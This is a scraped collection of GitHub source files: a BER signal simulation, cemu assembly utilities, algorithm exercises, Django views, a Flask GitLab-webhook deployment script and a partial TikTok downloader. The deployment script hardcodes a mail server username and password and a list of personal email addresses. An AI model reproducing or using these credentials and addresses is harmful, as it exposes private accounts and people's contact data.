result])\n#\n# solution(4, [4,4,4,4,4])\n\ndef solution(N, stages):\n answer = []\n length = len(stages)\n\n for i in range(1, N+1):\n count = stages.count(i)\n if length == 0:\n fail = 0\n else:\n fail = count / length\n answer.append((i, fail))\n length -= count\n answer = sorted(answer, key=lambda t : t[1], reverse=True)\n answer = [i[0] for i in answer]\n return answer","repo_name":"HongGunWoo/Python-Programming-Team-Notes","sub_path":"정렬/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6475859488","text":"import matplotlib.pyplot as plt\nimport math\nfrom numpy import random, array\nfrom random import randint\nfrom Transmitter import transmitter\nfrom NoiseChannel import NoiseChannel\nfrom Receiver import receiver\nfrom convolution import multiplethreading\n\ninputSize = int(raw_input('Enter the size of the input: '))\nsnrSize = int(raw_input('Enter size of SNR array: '))\nsnrArray = raw_input('Enter SNR array: ').split()\n\nfor i in range(snrSize):\n\tsnrArray[i] = int(snrArray[i])\n\ndigitalInput_X1 = []\nfor i in range(inputSize):\n\tdigitalInput_X1.append(randint(0,1))\n\ndigitalInput_X2 = []\nfor i in range(inputSize):\n\tdigitalInput_X2.append(randint(0,1))\n\n# Output of Transmitter\ntransmitSignal_X1, transmitSignal_X2 = transmitter(digitalInput_X1, digitalInput_X2, inputSize)\n\n#Output after impulse convolution\n#hValue = random.randn(2,2)\nhValue = array([[0.4,0.9],[0.5,0.8]])\nconvolved_X1, convolved_X2 = multiplethreading(transmitSignal_X1, transmitSignal_X2, hValue)\n\n# Output after noise addition\nnoisedSignal_X1, noisedSignal_X2 = NoiseChannel(convolved_X1, convolved_X2, inputSize, snrArray, snrSize)\n\n# Signal received at receiver and demodulated\nreceivedSignal_X1, receivedSignal_X2 = receiver(noisedSignal_X1, noisedSignal_X2, len(noisedSignal_X1), len(noisedSignal_X2), hValue)\n\nt = []\nfor i in xrange(len(receivedSignal_X1)/inputSize):\n\tt.append(receivedSignal_X1[i*inputSize:((i+1)*inputSize)])\nreceivedSignal_X1 = t\n\nt1 = []\nfor i in xrange(len(receivedSignal_X2)/inputSize):\n\tt1.append(receivedSignal_X2[i*inputSize:((i+1)*inputSize)])\nreceivedSignal_X2 = t1\n\n#print '\\n', receivedSignal_X1, '\\n', receivedSignal_X2\n#print '\\n', digitalInput_X1, '\\n', digitalInput_X2\n# Error per SNR calculations\n\nerr_X1 = []\nerr_X2 = []\nfor i in range(len(receivedSignal_X1)):\n l = [0]*inputSize\n for j in range(len(digitalInput_X1)):\n \tl[j] = abs(receivedSignal_X1[i][j] - digitalInput_X1[j])\n err_X1.append(sum(l))\n#print err_X1\nfor i in range(len(receivedSignal_X2)):\n l = [0]*inputSize\n for j in range(len(digitalInput_X2)):\n \tl[j] = abs(receivedSignal_X2[i][j] - digitalInput_X2[j])\n err_X2.append(sum(l))\n#print err_X2\nerr_X1[snrSize/2:] = err_X2[snrSize/2:]\n# Error per bit calculations\nfor i in range(len(err_X1)):\n\terr_X1[i] /= float(inputSize)\n\terr_X1[i] += 0.00005\n#print err_X1\nfor i in range(len(err_X2)):\n\terr_X2[i] /= float(inputSize)\n\n#print err_X2\n# Theoritical bit error rate calculation\nber = [0]*snrSize\nfor i in range(snrSize):\n\tber[i] = 0.5*math.erfc(math.sqrt(10**(snrArray[i]/10.0)))\n# Practical Plot1\nplt.figure(1)\nplt.semilogy(snrArray, err_X1, 'r')\n\n# Theoritical Plot\nplt.semilogy(snrArray, ber, 'b')\nplt.title('Theoritical/Practical BER Curve for X1')\nplt.xlabel('SNR per bit in dB')\nplt.ylabel('Bit Error Rate in dB')\nplt.legend(['Practical', 'Theoritical'],loc=3)\nplt.axis([snrArray[0],snrArray[-1],10**-5,10**0])\n\n# Practical Plot2\nplt.figure(2)\nplt.semilogy(snrArray, err_X2, 'r')\n\n# Theoritical Plot\nplt.semilogy(snrArray, ber, 'b')\nplt.title('Theoritical/Practical BER Curve for X2')\nplt.xlabel('SNR per bit in dB')\nplt.ylabel('Bit Error Rate in dB')\nplt.legend(['Practical', 'Theoritical'],loc=3)\nplt.axis([snrArray[0],snrArray[-1],10**-5,10**0])\n\nplt.show()","repo_name":"tarunlnmiit/wireless-modulations-btp","sub_path":"Module 2/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18086052910","text":"# -*- coding: utf-8 -*-\n\nimport string\nimport importlib\nimport re\nimport os\n\nimport capstone\nimport keystone\nimport unicorn\n\nfrom cemu.arch import Syntax, Endianness, \\\n is_x86_16, is_x86_32, is_x86_64, is_x86, \\\n is_arm, is_arm_thumb, is_aarch64, \\\n is_mips, is_mips64, \\\n is_sparc, is_sparc64, \\\n is_ppc\n\n\ndef hexdump(source, length=0x10, separator='.', show_raw=False, base=0x00):\n result = []\n for i in range(0, len(source), length):\n s = source[i:i+length]\n\n hexa = ' '.join([\"%02X\" % c for c in s])\n text = ''.join( [chr(c) if 0x20 <= c < 0x7F else separator for c in s] )\n\n if show_raw:\n result.append(hexa)\n else:\n result.append( \"%#-.*x %-*s %s\" % (16, base+i, 3*length, hexa, text) )\n\n return '\\n'.join(result)\n\n\n\ndef format_address(addr, mode):\n if mode.ptrsize == 2:\n return \"%#.4x\" % (addr & 0xFFFF)\n elif mode.ptrsize == 4:\n return \"%#.8x\" % (addr & 0xFFFFFFFF)\n elif mode.ptrsize == 8:\n return \"%#.16x\" % (addr & 0xFFFFFFFFFFFFFFFF)\n\n\ndef get_arch_mode(lib, a):\n arch = mode = endian = None\n\n # x86\n if is_x86_16(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_16, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_16, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_16, unicorn.UC_MODE_LITTLE_ENDIAN\n\n elif is_x86_32(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_32, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_32, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_32, unicorn.UC_MODE_LITTLE_ENDIAN\n\n elif is_x86_64(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_64, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_64, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_64, unicorn.UC_MODE_LITTLE_ENDIAN\n\n # arm\n elif is_arm(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM, unicorn.UC_MODE_ARM, unicorn.UC_MODE_LITTLE_ENDIAN\n elif is_arm_thumb(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM, unicorn.UC_MODE_THUMB, unicorn.UC_MODE_LITTLE_ENDIAN\n\n # aarch64\n elif is_aarch64(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_ARM64, 0, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM64, unicorn.UC_MODE_ARM, unicorn.UC_MODE_LITTLE_ENDIAN\n\n # powerpc (uncomment when unicorn supports ppc)\n # elif is_ppc(m):\n # if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_PPC, keystone.KS_MODE_PPC32, keystone.KS_MODE_BIG_ENDIAN\n # elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_PPC, 0, capstone.CS_MODE_BIG_ENDIAN\n # else: arch, mode, endian = unicorn.UC_ARCH_PPC, unicorn.UC_MODE_PPC32, unicorn.UC_MODE_BIG_ENDIAN\n\n # mips/mips64\n elif is_mips(a):\n if a.endianness==Endianness.LITTLE:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS32, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS32, unicorn.UC_MODE_LITTLE_ENDIAN\n else:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS32, keystone.KS_MODE_BIG_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32, capstone.CS_MODE_BIG_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS32, unicorn.UC_MODE_BIG_ENDIAN\n elif is_mips64(a):\n if a.endianness==Endianness.LITTLE:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS64, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS64, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS64, unicorn.UC_MODE_LITTLE_ENDIAN\n else:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS64, keystone.KS_MODE_BIG_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS64, capstone.CS_MODE_BIG_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS64, unicorn.UC_MODE_BIG_ENDIAN\n\n # sparc/sparc64\n elif is_sparc(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_SPARC, keystone.KS_MODE_SPARC32, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_SPARC, 0, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_SPARC, unicorn.UC_MODE_SPARC32, unicorn.UC_MODE_LITTLE_ENDIAN\n elif is_sparc(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_SPARC, keystone.KS_MODE_SPARC64, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_SPARC, 0, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_SPARC, unicorn.UC_MODE_SPARC64, unicorn.UC_MODE_LITTLE_ENDIAN\n\n if arch is None and mode is None and endian is None:\n raise Exception(\"Failed to get architecture parameter from mode\")\n\n return arch, mode, endian\n\n\ndef disassemble(raw_data, mode):\n arch, mode, endian = get_arch_mode(\"capstone\", mode)\n cs = capstone.Cs(arch, mode | endian)\n if is_x86(mode) and mode.syntax == Syntax.ATT:\n cs.syntax = capstone.CS_OPT_SYNTAX_ATT\n\n insns = [\"{:s} {:s}\".format(i.mnemonic, i.op_str) for i in cs.disasm(bytes(raw_data), 0x4000)]\n return \"\\n\".join(insns)\n\n\ndef disassemble_file(fpath, mode):\n with open(fpath, 'rb') as f:\n raw_data = f.read()\n\n return disassemble(raw_data, mode)\n\n\ndef assemble(asm_code, mode):\n \"\"\"\n Helper function to assemble code receive in parameter `asm_code` using Keystone.\n\n @param asm_code : assembly code in bytes (multiple instructions must be separated by ';')\n @param mode : defines the mode to use Keystone with\n @return a tuple of bytecodes as bytearray, along with the number of instruction compiled. If failed, the\n bytearray will be empty, the count of instruction will be the negative number for the faulty line.\n \"\"\"\n arch, mode, endian = get_arch_mode(\"keystone\", mode)\n ks = keystone.Ks(arch, mode | endian)\n if is_x86(mode) and mode.syntax == Syntax.ATT:\n ks.syntax = keystone.KS_OPT_SYNTAX_ATT\n\n try:\n bytecode, cnt = ks.asm(asm_code, as_bytes=True)\n except keystone.keystone.KsError as kse:\n return (b'', kse.get_asm_count())\n\n return (bytecode, cnt)\n\n\ndef ishex(x):\n if x.startswith(\"0x\") or x.startswith(\"0X\"):\n x = x[2:]\n return all([c in string.hexdigits for c in x])\n\n\ndef list_available_plugins():\n pysearchre = re.compile('.py$', re.IGNORECASE)\n pluginfiles = filter(pysearchre.search,\n os.listdir(os.path.join(os.path.dirname(__file__), \"plugins\")))\n form_module = lambda fp: os.path.splitext(fp)[0]\n plugins = map(form_module, pluginfiles)\n for plugin in plugins:\n if not plugin.startswith('__'):\n yield plugin\n return\n\n\ndef load_plugin(plugin):\n mod = None\n\n try:\n mod = importlib.import_module(\"cemu.plugins.{}\".format(plugin))\n except ImportError as ie:\n print(\"Failed to import '{}' - reason: {}\".format(plugin, ie))\n return None\n\n return mod\n","repo_name":"GatoAmarilloBicolor/cemu","sub_path":"cemu/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"23063375961","text":"import math\n \nclass Graph(object):\n def __init__(self, n, Fgraph):\n self.nodes = n\n self.graph = self.simmetric(nodes, Fgraph)\n \n def simmetric(self, nodes, Fgraph):\n graph = {}\n for node in nodes:\n graph[node] = {}\n graph.update(Fgraph)\n for node, edges in graph.items():\n for AdjacentNode, value in edges.items():\n if graph[AdjacentNode].get(node, False) == False:\n graph[AdjacentNode][node] = value\n return graph\n \n def GettingEdges(self, node):\n connections = []\n for out_node in self.nodes:\n if self.graph[node].get(out_node, False) != False:\n connections.append(out_node)\n return connections\n\ndef DijkstraAlgorithm(graph, StartNode):\n UnvisitedNodes = list(graph.nodes)\n ShortestPath = {}\n PreviousNodes = {} \n MaxValue = math.inf\n for node in UnvisitedNodes:\n ShortestPath[node] = MaxValue\n ShortestPath[StartNode] = 0\n while UnvisitedNodes:\n CurrentMin = None\n for node in UnvisitedNodes:\n if CurrentMin == None:\n CurrentMin = node\n elif ShortestPath[node] < ShortestPath[CurrentMin]:\n CurrentMin = node\n neighbors = graph.GettingEdges(CurrentMin)\n for neighbor in neighbors:\n TentativeValue = ShortestPath[CurrentMin] + graph.graph[CurrentMin][neighbor]\n if TentativeValue < ShortestPath[neighbor]:\n ShortestPath[neighbor] = TentativeValue\n PreviousNodes[neighbor] = CurrentMin\n UnvisitedNodes.remove(CurrentMin)\n \n return PreviousNodes, ShortestPath\n\ndef print_result(PreviousNodes, ShortestPath, StartNode, TargetNode):\n path = []\n node = TargetNode\n \n while node != StartNode:\n path.append(node)\n node = PreviousNodes[node]\n path.append(StartNode)\n \n print(\"Длина короткого маршрута: {}.\".format(ShortestPath[TargetNode]))\n print(\"Короткий путь: \" + \" -> \".join(reversed(path)))\n\nnodes = ['A', 'B', 'C', 'D', 'E', 'F','G']\n \nGraphEdges = {}\nfor node in nodes:\n GraphEdges[node] = {}\n \nGraphEdges['A']['B'] = 7\nGraphEdges['A']['C'] = 1\nGraphEdges['A']['G'] = 3\nGraphEdges['B']['E'] = 3\nGraphEdges['C']['D'] = 4\nGraphEdges['D']['E'] = 4\nGraphEdges['D']['F'] = 2\nGraphEdges['D']['G'] = 2\nGraphEdges['E']['F'] = 5\nGraphEdges['D']['G'] = 2\n\n\ngraph = Graph(nodes, GraphEdges)\n\nPreviousNodes, ShortestPath = DijkstraAlgorithm(graph=graph, StartNode='A')\n\nprint_result(PreviousNodes, ShortestPath, StartNode='A', TargetNode='F')\n","repo_name":"Ksenia1611/Labs","sub_path":"lab5/Lab5.py","file_name":"Lab5.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19395999335","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport datetime\r\nimport shutil\r\nimport subprocess\r\nfrom subprocess import Popen, PIPE\r\nimport json\r\nfrom threading import Thread\r\n\r\nfrom flask import Flask, request, render_template\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\n\r\nmail = Mail(app)\r\n\r\napp.config['MAIL_SERVER'] = 'mail.heclouds.com'\r\napp.config['MAIL_PORT'] = 25\r\napp.config['MAIL_USERNAME'] = 'boer'\r\napp.config['MAIL_PASSWORD'] = 'Admin@123'\r\n\r\napp.config['CHECKOUT_DIR'] = '/data/deployment/gitrepos'\r\napp.config['DEPLOY_DIR'] = '/data/deployment/deploydir'\r\napp.config['PROJECTS_DIR'] = '/data/deployment/projects'\r\n\r\ndef update_repo(repo_path, repo_url, commit_id):\r\n git_path = os.path.join(repo_path, '.git')\r\n if os.path.exists(git_path) and os.path.isdir(git_path):\r\n cmd = 'cd %s && git reset --hard origin/master && git pull -q' % repo_path\r\n rc = subprocess.check_call(cmd, shell=True, cwd=repo_path)\r\n else:\r\n if os.path.exists(os.path.dirname(repo_path)) and os.path.isdir(os.path.dirname(repo_path)):\r\n shutil.rmtree(os.path.dirname(repo_path))\r\n else:\r\n os.makedirs(os.path.dirname(repo_path))\r\n cmd = 'git clone -q %s' % repo_url\r\n rc = subprocess.check_call(cmd.split(), cwd=os.path.dirname(repo_path))\r\n # 指定commit_id\r\n cmd = 'git reset -q --hard %s' % commit_id\r\n rc = subprocess.check_call(cmd.split(), cwd=repo_path)\r\n \r\ndef rsync_local(src, dest, excludes=[]):\r\n excludes.append('.git')\r\n exclude_args = ''\r\n for e in excludes:\r\n exclude_args = exclude_args + ' --exclude %s' % e\r\n cmd = 'rsync -qa --delete %s %s%s %s%s' % (exclude_args, src, os.sep, dest, os.sep)\r\n rc = subprocess.check_call(cmd.split())\r\n\r\ndef chk_and_set_exe(src_path):\r\n if not os.access(src_path, os.X_OK):\r\n os.chmod(src_path, 755)\r\n\r\ndef exec_script(script_file):\r\n if os.path.exists(script_file) and os.path.isfile(script_file):\r\n chk_and_set_exe(script_file)\r\n outputs = subprocess.check_output(script_file, shell=True)\r\n # p = Popen(script_file, stdout=PIPE)\r\n # c_pid = p.pid\r\n # outputs = p.communicate()[0]\r\n # rc = p.poll()\r\n #if rc == 0:\r\n # p.terminate()\r\n #else:\r\n # p.kill()\r\n return outputs\r\n \r\n\r\n# 同步邮件\r\ndef send_sync_email(sender, to, cc, subject, template, **kwargs):\r\n msg = Message(subject, sender=sender, recipients=to, cc=cc)\r\n # msg.body = render_template(template + '.txt', **kwargs)\r\n msg.html = render_template(template + '.html', **kwargs)\r\n mail.send(msg)\r\n\r\n# 异步发邮件\r\ndef send_async_email(app, msg):\r\n with app.app_context():\r\n mail.send(msg)\r\n\r\ndef send_email(sender, to, cc, subject, template, **kwargs):\r\n msg = Message(subject, sender=sender, recipients=to, cc=cc)\r\n # msg.body = render_template(template + '.txt', **kwargs)\r\n msg.html = render_template(template + '.html', **kwargs)\r\n thr = Thread(target=send_async_email, args=[app, msg])\r\n thr.start()\r\n return thr \r\n\r\n@app.route('/sendmail')\r\ndef sendmail():\r\n user_email_map = {\r\n 'zhanghaibo': 'boer0924@qq.com',\r\n 'mazhijie': '528254060@qq.com',\r\n 'jieyuanfei': 'j.2ue@qq.com',\r\n 'weizhengdong': '970250137@qq.com',\r\n 'tanjiang': '289801415@qq.com',\r\n 'chenbo': '150339480@qq.com'\r\n }\r\n send_email('boer@heclouds.com', ['528254060@qq.com', 'j.2ue@qq.com', 'boer0924@qq.com'], ['289801415@qq.com', '150339480@qq.com'], 'Just a test', 'deploy')\r\n # msg = Message('Hello', sender=\"boer0924@hotmail.com\", recipients=['boer0924@qq.com'])\r\n # msg.body = \"testing\"\r\n # mail.send(msg)\r\n return 'done'\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n results = json.loads(request.data)\r\n noteable_type = results['object_attributes']['noteable_type']\r\n # Triggered when a new comment is made on commits, merge requests, issues, and code snippets. \r\n if noteable_type != 'Commit':\r\n return '', 404\r\n # user 相关\r\n name = results['user']['name']\r\n username = results['user']['username']\r\n if username != 'zhanghaibo':\r\n return '', 403\r\n # repository 相关\r\n repo_name = results['repository']['name']\r\n repo_url = results['repository']['url']\r\n repo_path = git_path = os.path.join(app.config['CHECKOUT_DIR'], repo_name, repo_name)\r\n # commit 相关\r\n commit_id = results['commit']['id']\r\n print('---commit_id---', commit_id)\r\n commit_msg = results['commit']['message'].strip('\\n')\r\n # object_attributes 相关\r\n try:\r\n notes = results['object_attributes']['note']\r\n if not notes.startswith('```json') and not notes.endswith('```'):\r\n return ''\r\n notes = notes.lstrip('```json').rstrip('```').replace('\\r\\n', '') \r\n notes = json.loads(notes)\r\n except Exception as e:\r\n print('<-debug->', e)\r\n # send_email()\r\n return ''\r\n deploy_type = notes.get('deploy_type')\r\n recipients = notes.get('recipients')\r\n carbon_copy = notes.get('carbon_copy')\r\n functions = notes.get('functions')\r\n\r\n update_repo(repo_path, repo_url, commit_id)\r\n rsync_local(repo_path, os.path.join(app.config['DEPLOY_DIR'], repo_name, repo_name))\r\n\r\n script_file = ''\r\n subject = ''\r\n if deploy_type == 'weekfix':\r\n script_file = os.path.join(app.config['PROJECTS_DIR'], repo_name + '_weekfix', 'script/local_after.sh')\r\n subject = datetime.datetime.strftime(datetime.date.today(), '%Y/%m/%d') + 'weekfix测试'\r\n elif deploy_type == 'hotfix':\r\n pass\r\n elif deploy_type == 'feature':\r\n pass\r\n elif deploy_type == 'prod':\r\n pass\r\n else:\r\n print('滚蛋吧')\r\n outputs = exec_script(script_file)\r\n print(outputs)\r\n print(type(outputs))\r\n send_sync_email('boer@heclouds.com', recipients, carbon_copy, subject, 'deploy', functions=functions, outputs=outputs)\r\n return ''\r\n return '', 405\r\n\r\nif __name__ == '__main__':\r\n app.run(host='172.19.3.23', port=8080)\r\n# {\r\n# \"deploy_type\": \"weekfix/feature/hotfix/prod\",\r\n# \"recipients\": [\"mazhijie\", \"limao\", \"dengdeng\"],\r\n# \"carbon_copy\": [\"bmwlee\", \"limao\"],\r\n# \"functions\": [\r\n# {\r\n# \"name\": \"功能点一\",\r\n# \"content\": \"balabala~\"\r\n# },\r\n# {\r\n# \"name\": \"功能点二\",\r\n# \"content\": \"balabala~\"\r\n# }\r\n# ]\r\n# }\r\n\r\n# onenet_v3\r\n# onenet_ee\r\n# forum_v2\r\n# passport\r\n# phpcorelib\r\n# groupservice\r\n# admin_onenetv3\r\n# campaignmap","repo_name":"boer0924/BoerOPS","sub_path":"app/utils/sendemail.py","file_name":"sendemail.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"424457005","text":"# 백준 4485 녹색 옷 입은 애가 젤다지?\n\nimport sys, heapq\n\ndef dijkstra():\n global amount\n\n heap = []\n heapq.heappush(heap, (amount[0][0], 0, 0))\n \n while heap:\n min_val, x, y = heapq.heappop(heap)\n\n if x == N-1 and y == N-1:\n return\n \n for dx, dy in dxy:\n nx, ny = x+dx, y+dy\n\n if 0 <= nx < N and 0 <= ny < N and amount[nx][ny] > min_val + cave[nx][ny]:\n amount[nx][ny] = min_val + cave[nx][ny]\n heapq.heappush(heap, (amount[nx][ny], nx, ny))\n\n\ninput = sys.stdin.readline\n\ni = 1\nwhile True:\n N = int(input())\n\n if not N:\n break\n\n cave = [list(map(int, input().split())) for _ in range(N)]\n \n dxy = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n amount = [[float('inf') for _ in range(N)] for _ in range(N)]\n amount[0][0] = cave[0][0]\n\n dijkstra()\n\n print(f'Problem {i}: {amount[N-1][N-1]}')\n i += 1","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"038주차/녹색 옷 입은 애가 젤다지/hyunseo.py","file_name":"hyunseo.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"40106072711","text":"#!/usr/bin/python3\nclass Square:\n 'Square object class'\n\n def __init__(self, size=0):\n 'Initialize data'\n if isinstance(size, int) is not True:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, value):\n 'Method to set self.__size'\n if isinstance(value, int) is False:\n raise TypeError(\"size must be an integer\")\n self.__size = value\n\n def area(self):\n 'Method to square self.__size'\n if isinstance(self.__size, int) is not True:\n raise TypeError(\"size must be an integer\")\n if self.__size < 0:\n raise ValueError(\"size must be >= 0\")\n return self.__size**2\n","repo_name":"jarehec/holbertonschool-higher_level_programming","sub_path":"0x07-python-classes/4-square.py","file_name":"4-square.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42697365940","text":"from django.shortcuts import render, get_object_or_404, HttpResponse\nfrom django.views.generic import View, DetailView, ListView\nfrom dealers.models import Dealer\nfrom .forms import DealerForm\nfrom django.shortcuts import redirect, reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nclass DealerCreate(View):\n\n @method_decorator(login_required)\n def get(self, request):\n context = {'form':DealerForm}\n return render(request, 'dealers/dealer_create.html', context)\n\n @method_decorator(login_required)\n def post(self, request):\n form = DealerForm(request.POST)\n if form.is_valid():\n new_dealer = Dealer(\n name = form.cleaned_data['name'],\n user = request.user\n )\n new_dealer.save()\n return redirect(new_dealer)\n else:\n return redirect(reverse('dealers:dealer_create'))\n\n\nclass DealerDetail(DetailView):\n context_object_name = 'dealer'\n slug_field = 'name'\n queryset = Dealer.objects.all()\n\n\nclass DealerList(ListView):\n context_object_name = 'dealers'\n queryset = Dealer.objects.all()\n\n\nclass DealerUpdate(View):\n\n def get(self, request, slug):\n dealer = get_object_or_404(Dealer, name__iexact=slug)\n if request.user == dealer.user:\n context = {'form':DealerForm(initial=dealer)}\n return render(request, 'dealers/dealer_update.html', context)\n else:\n HttpResponse('You is not owner')\n\n def post(self, request, slug):\n dealer = get_object_or_404(Dealer, name__iexact=slug)\n if request.user == dealer.user:\n form = DealerForm(request.user, request.POST)\n if form.is_valid():\n new_dealer = Dealer(\n name = form.cleaned_data['name'],\n dealer = form.cleaned_data['dealer']\n )\n new_dealer.save()\n return redirect(new_dealer)\n else:\n return redirect(reverse('dealership:dealership_update'))\n else:\n HttpResponse('You is not owner')\n\n","repo_name":"WhiteJamer/dealerapp","sub_path":"dealers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15664124624","text":"import logging\nfrom bot.engines.abstract import Video, AbstractEngine\nfrom utils import exceptions, sys_config, format_size\nimport re, requests, hashlib, os, random\nfrom urllib.parse import quote\n\nPHRASES = [\n \"📞 Asking Xi's permission to download\",\n \"🤙 Contacting with agent in TT headquaters\",\n \"✂️ Cutting TT webpage\",\n \"📛 Breaking through chinese firewall\",\n \"🔎 Searching video\"\n]\n\nclass TiktokEngine(AbstractEngine):\n def __init__(self) -> None:\n super().__init__()\n\n def consist_type(self, url) -> bool:\n tiktok = re.findall(r\"\\/\\/.*vm.tiktok\\.com\\/\",url)\n if len(tiktok) > 0:\n return True\n else:\n return False\n\n def proceed(self, url, notifier, session=requests.Session()) -> Video:\n self.notifier = notifier\n self.session = session\n video = Video(url=url)\n if not self.consist_type(url):\n return video\n\n name_hash = self.name_to_hash(video.url)\n if os.path.exists(self.get_downloaded_file_abspath(name_hash)):\n path = self.get_downloaded_file_abspath(name_hash)\n file_size = os.path.getsize(path)\n video.size = file_size\n video.path = path\n logging.info(\"Return saved video: {}\".format(path))\n return video\n\n try:\n if len(re.findall(r'(.*tiktok\\.com\\/@.*\\/live)', url)) > 0:\n raise exceptions.DownloadError(\"Can't download tiktok live stream. Try another url\")\n\n self.notifier.update_status(random.choice(PHRASES))\n\n video_link, video_id = None, None\n for i in range(3):\n self.notifier.make_progress_bar(i*10)\n\n tt_url = f\"https://tikmate.online/?lang=nl\"\n response = requests.post(f\"{sys_config('SPLASH_URL')}/execute\", json={\n \"url\" : \"https://tikmate.online/?lang=nl\",\n \"lua_source\" : f\"\"\"\n function main(splash, args)\n splash:on_request(function(request)\n request.headers['user-agent'] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"\n end)\n splash:go(args.url)\n assert(splash:wait(0.5))\n 